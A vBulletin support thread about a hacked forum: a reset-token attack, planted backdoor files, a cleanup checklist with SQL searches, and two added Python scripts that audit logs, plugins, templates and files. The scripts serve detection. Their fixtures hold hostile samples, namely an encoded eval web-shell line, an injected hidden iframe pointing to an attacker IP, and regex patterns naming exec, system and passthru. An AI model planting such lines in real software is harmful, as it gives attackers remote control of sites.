Forum compromised

  • stuarttunstall
    Senior Member
    • Feb 2004
    • 403
    • 4.2.X

    [Forum] Forum compromised

    Hi

    Need some advice... This afternoon I received an email telling me I had requested a password reset, which I had not... I then found one of my old admin accounts was logged in, which I promptly deleted..

    I have now found 2 files, usermain.php, which is a definite hack, and phpinfo.php.. which I have now deleted...

    It looks like it gets passwords and usernames.. How could this get uploaded? and what should I do now?

    I have changed my password and blocked the IP within vB and the server firewall, where I also found it had been added as an allowed IP.. no idea how they accessed it without a password

    Stuart
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24275
    • 6.0.X

    #2
    This sounds like the server has been compromised in some way.

    What version of vBulletin are you running?
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com


    • stuarttunstall
      Senior Member
      • Feb 2004
      • 403
      • 4.2.X

      #3
      That is what I thought.. looking at the logs, 3 usernames were looked at, all mine; 2 now removed and passwords changed... I have found upload logs for both files in cPanel.. so I think that is how they did it. Not sure if banning the IP at server level and vBulletin level will help?

      I am using 4.2.2 latest patch...

      I have looked at all the files dated today and removed anything strange.. the two I found appear to be the only ones, although I have asked the host to check further...

      Odd thing is someone also tried to log into my Gmail account using my password, no idea how they got that... that was blocked by Google... again, password changed twice by logging in without using the warning emails, just in case


      I think this email may have been related to one of my accounts

      Worrying to say the least
      Last edited by stuarttunstall; Wed 14 Sep '16, 2:23pm.


      • Royalridge
        Member
        • Oct 2004
        • 31
        • 3.8.11

        #4
        I've had very similar yesterday with vB 3.8. The sequence of events was:

        Password reset requested for an administrator account.
        Several attempts at sending the reset token via HTTP GET.
        Looks like one of these was successful.
        User logged in to the vB Admin control panel.
        Then from the vB Admin control panel they uploaded three "products", which were subsequently "deleted".
        A vBulletin "style" was also uploaded, accessed then deleted.
        Options in the admincp were looked at and possibly changed (still investigating this).
        In the payments API the destination e-mail address for PayPal payments was changed.
        Uploaded files were usermain.php, xml.php (both in the forum folder) and phpinfo.php in the webroot and sqls.php in "client"

        phpinfo.php - A file uploader
        xml.php - A multi-use tool with various menu options.
        usermain.php - A vBulletin "backdoor" that will log in any user by their userid
        sqls.php - Single file SQL tool

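The sequence Royalridge lays out (reset requested, a burst of reset-token GETs, then admincp activity and hits on a planted script) is easy to spot in an access log once you look for it. The script below is an added example written for this page, not code from the thread or from vBulletin: it parses a handful of constructed combined-format log lines, groups `login.php?do=resetpassword&u=...&i=...` requests by source IP and target userid, flags any IP that tried several distinct tokens for one user, records whether that IP went on to touch `/admincp/`, and lists requests to PHP scripts that are not part of the known install. The URL shapes (`do=emailpassword`, `do=resetpassword`, `admincp/plugin.php?do=productimport`), the IP addresses, the threshold and the `KNOWN_SCRIPTS` list are all assumptions for the example; adjust them to your board's paths.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined-log prefix, trailing fields trimmed).
# 203.0.113.7 plays the attacker; 198.51.100.9 is a member who forgot a
# password once. URL shapes are assumed from vB3/vB4's login.php and admincp.
SAMPLE_LOG = """\
198.51.100.9 - - [13/Sep/2016:13:55:02 +0000] "POST /forum/login.php?do=emailpassword HTTP/1.1" 200 1210
198.51.100.9 - - [13/Sep/2016:13:58:41 +0000] "GET /forum/login.php?do=resetpassword&u=512&i=4c9a7e21 HTTP/1.1" 200 980
203.0.113.7 - - [13/Sep/2016:14:02:11 +0000] "POST /forum/login.php?do=emailpassword HTTP/1.1" 200 1210
203.0.113.7 - - [13/Sep/2016:14:02:40 +0000] "GET /forum/login.php?do=resetpassword&u=1&i=0f1d9c3a HTTP/1.1" 200 1150
203.0.113.7 - - [13/Sep/2016:14:02:41 +0000] "GET /forum/login.php?do=resetpassword&u=1&i=0f1d9c3b HTTP/1.1" 200 1150
203.0.113.7 - - [13/Sep/2016:14:02:42 +0000] "GET /forum/login.php?do=resetpassword&u=1&i=0f1d9c3c HTTP/1.1" 200 1150
203.0.113.7 - - [13/Sep/2016:14:02:43 +0000] "GET /forum/login.php?do=resetpassword&u=1&i=0f1d9c3d HTTP/1.1" 200 980
203.0.113.7 - - [13/Sep/2016:14:05:19 +0000] "GET /forum/admincp/index.php HTTP/1.1" 200 4400
203.0.113.7 - - [13/Sep/2016:14:07:02 +0000] "POST /forum/admincp/plugin.php?do=productimport HTTP/1.1" 200 3100
203.0.113.7 - - [13/Sep/2016:14:07:30 +0000] "GET /forum/usermain.php?u=1 HTTP/1.1" 200 220
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Distinct reset tokens tried for one userid from one IP before we call it guessing (assumed).
TOKEN_ATTEMPT_THRESHOLD = 3

# Scripts that belong to the install (assumed, trimmed list); anything else hit is worth a look.
KNOWN_SCRIPTS = {"/forum/index.php", "/forum/login.php", "/forum/admincp/index.php",
                 "/forum/admincp/plugin.php", "/forum/admincp/template.php"}


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"], "url": m["url"],
            "path": url.path, "query": parse_qs(url.query), "status": int(m["status"])}


def analyse(log_text):
    """One finding per (ip, userid) that looks like reset-token guessing, plus what followed."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    per_ip = defaultdict(lambda: {"tokens": defaultdict(set), "first_reset": None, "admincp": []})
    for idx, e in enumerate(events):
        rec = per_ip[e["ip"]]
        do = e["query"].get("do", [""])[0]
        if e["path"].endswith("/login.php") and do == "resetpassword" and e["method"] == "GET":
            uid = e["query"].get("u", ["?"])[0]
            rec["tokens"][uid].add(e["query"].get("i", [""])[0])
            if rec["first_reset"] is None:
                rec["first_reset"] = idx
        elif "/admincp/" in e["path"]:
            rec["admincp"].append((idx, e["url"]))
    findings = []
    for ip, rec in per_ip.items():
        for uid, tokens in rec["tokens"].items():
            if len(tokens) < TOKEN_ATTEMPT_THRESHOLD:
                continue
            after = [u for i, u in rec["admincp"] if i > rec["first_reset"]]
            findings.append({"ip": ip, "userid": uid, "reset_attempts": len(tokens),
                             "admincp_after_reset": bool(after), "admincp_urls": after})
    return findings


def unknown_scripts(events):
    """Sorted .php paths that were requested but are not in KNOWN_SCRIPTS."""
    return sorted({e["path"] for e in events
                   if e["path"].endswith(".php") and e["path"] not in KNOWN_SCRIPTS})


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f)
    evs = [e for e in (parse_line(l) for l in SAMPLE_LOG.splitlines()) if e]
    print("unknown scripts hit:", unknown_scripts(evs))
```

Run it against the real access log (`python reset_check.py < access.log` after swapping `SAMPLE_LOG` for `sys.stdin.read()`) and the finding for the attacker's IP gives you the userid whose token was guessed and the admincp pages touched afterwards, which is exactly the list of things to roll back: products, styles, options and the PayPal address.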

        • Mark.B
          vBulletin Support
          • Feb 2004
          • 24275
          • 6.0.X

          #5
          Make sure that you are running the latest version of vB4 (4.2.3 at the moment).
          Make sure php is at least 5.5.

          Then go through the following:

          1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

          2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

          3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

          4) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

          5) Make sure that your plugins do not include calls to exec(), system(), or passthru(), or iframes. These are also often signs of a hacked site.

          Query for steps 4 and 5 -
          SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

          6) Run this query:
          SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

          7) Check your list of admins. If there are any you do not recognise, delete them (don't ban them, delete them).

          If you're still unsure, and if you have support, please raise a support ticket and we'll take a look. We will need admincp access and ftp access.
          MARK.B
          vBulletin Support

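Steps 1, 2 and 4 to 6 of the checklist above can be scripted so they are repeatable after every incident. The following is an added example written for this page, not code from the thread or from vBulletin itself. It builds a tiny in-memory SQLite stand-in for vB4's `plugin` and `template` tables (minimal columns only) with constructed rows, runs the post's own broad LIKE query, then a tighter second pass that only fires on real call sites (`eval(`, `base64_decode(`, `system(`, `passthru(`, ...) or on an `<iframe>` in a template that is not on the post's list of templates that legitimately carry one. It then lays out a scratch directory standing in for the forum root and compares it against a hash manifest of a clean install, which is what Suspect File Diagnostics does for you. The rows, files, hashes and regexes are constructed for the example; against a live board you would point the same queries at MySQL (with your table prefix) and the same walk at the real web root, with a manifest generated from a pristine copy of your exact vB version.

```python
import hashlib
import os
import re
import sqlite3
import tempfile

# Constructed rows standing in for vB4's plugin and template tables (minimal
# columns). One clean plugin, one that merely mentions "filesystem", one hostile.
PLUGINS = [
    ("Thread counter", "global_start", "$vbulletin->options['tc'] = 1;", "vbulletin", 1),
    ("Attachment cache", "global_start", "// flush the filesystem cache", "myaddon", 1),
    ("Style helper", "global_start", "eval(base64_decode('ZXZhbCgkX1BPU1RbJ2MnXSk7'));", "vbulletin", 1),
]
TEMPLATES = [
    (1, "bbcode_video", '<iframe src="{vb:raw url}"></iframe>'),
    (1, "FOOTER", '<div><iframe src="http://203.0.113.7/x.php" width="0"></iframe></div>'),
    (1, "header", '<div id="header">{vb:raw vboptions.bbtitle}</div>'),
]
# The post's query for steps 4 and 5 (passthru spelled as PHP spells it).
THREAD_PLUGIN_QUERY = (
    "SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' "
    "OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' "
    "OR phpcode LIKE '%iframe%'"
)
# Second pass: real call sites and real tags only, so 'filesystem' in a comment does not fire.
CODE_RE = re.compile(r"\b(?:eval|base64_decode|exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
IFRAME_RE = re.compile(r"<iframe\b", re.I)
# Templates the post says legitimately carry an iframe (step 2).
IFRAME_OK = {"bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
             "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
             "search_common_select_type"}


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE plugin (title TEXT, hookname TEXT, phpcode TEXT, product TEXT, active INTEGER)")
    db.execute("CREATE TABLE template (styleid INTEGER, title TEXT, template TEXT)")
    db.executemany("INSERT INTO plugin VALUES (?,?,?,?,?)", PLUGINS)
    db.executemany("INSERT INTO template VALUES (?,?,?)", TEMPLATES)
    return db


def broad_plugin_hits(db):
    """Titles returned by the thread's own LIKE query: broad, so expect noise."""
    return [row[0] for row in db.execute(THREAD_PLUGIN_QUERY)]


def suspicious_plugins(db):
    return [t for t, code in db.execute("SELECT title, phpcode FROM plugin") if CODE_RE.search(code)]


def suspicious_templates(db):
    hits = []
    for styleid, title, body in db.execute("SELECT styleid, title, template FROM template"):
        if CODE_RE.search(body) or (IFRAME_RE.search(body) and title not in IFRAME_OK):
            hits.append((styleid, title))
    return hits


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_files(root, manifest):
    """manifest maps relative path -> sha256 of the pristine file (step 1 by hand)."""
    seen = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            seen[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_of(full)
    return {"modified": sorted(p for p, h in manifest.items() if p in seen and seen[p] != h),
            "unknown": sorted(p for p in seen if p not in manifest and p.endswith(".php")),
            "missing": sorted(p for p in manifest if p not in seen)}


def demo_file_audit():
    """Scratch forum root: one tampered stock file, two planted scripts, one stock file gone."""
    pristine = {"index.php": b"<?php // stock index\n", "includes/class_core.php": b"<?php // stock core\n",
                "admincp/index.php": b"<?php // stock admincp\n"}
    manifest = {p: hashlib.sha256(c).hexdigest() for p, c in pristine.items()}
    with tempfile.TemporaryDirectory() as root:
        for rel, content in pristine.items():
            if rel == "admincp/index.php":
                continue  # simulate a stock file that was removed
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(content)
        with open(os.path.join(root, "index.php"), "ab") as f:
            f.write(b"eval($_POST['c']);\n")  # tampered stock file
        for planted in ("usermain.php", "phpinfo.php"):  # the files named in this thread
            with open(os.path.join(root, planted), "wb") as f:
                f.write(b"<?php // planted\n")
        return audit_files(root, manifest)


if __name__ == "__main__":
    db = build_db()
    print("broad LIKE hits:", broad_plugin_hits(db))
    print("plugins with real call sites:", suspicious_plugins(db))
    print("templates with rogue iframe/code:", suspicious_templates(db))
    print("file audit:", demo_file_audit())
```

The two-pass approach matters in practice: the LIKE query flags "Attachment cache" just because its comment contains the word "filesystem", while the regex pass keeps only the plugin with a real `eval(base64_decode(...))`, and leaves `bbcode_video` alone because its iframe is expected. The file audit reports three classes of result, and "unknown" PHP files such as `usermain.php` are the ones to pull for analysis before deleting.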
